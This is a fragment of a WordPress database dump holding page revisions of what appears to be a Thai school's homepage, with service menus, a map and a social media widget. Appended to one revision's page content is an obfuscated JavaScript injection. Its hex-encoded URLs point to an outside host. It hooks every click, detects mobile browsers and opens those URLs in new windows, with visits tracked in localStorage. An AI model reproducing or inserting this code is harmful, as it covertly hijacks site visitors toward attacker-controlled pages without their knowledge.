#ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-02 10:40:05','2025-07-02 03:40:05','',14,'http://pakhaeng.ssk.in.th/?p=1597',0,'revision','',0),
(1598,1,'2025-07-02 10:40:21','2025-07-02 03:40:21','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items 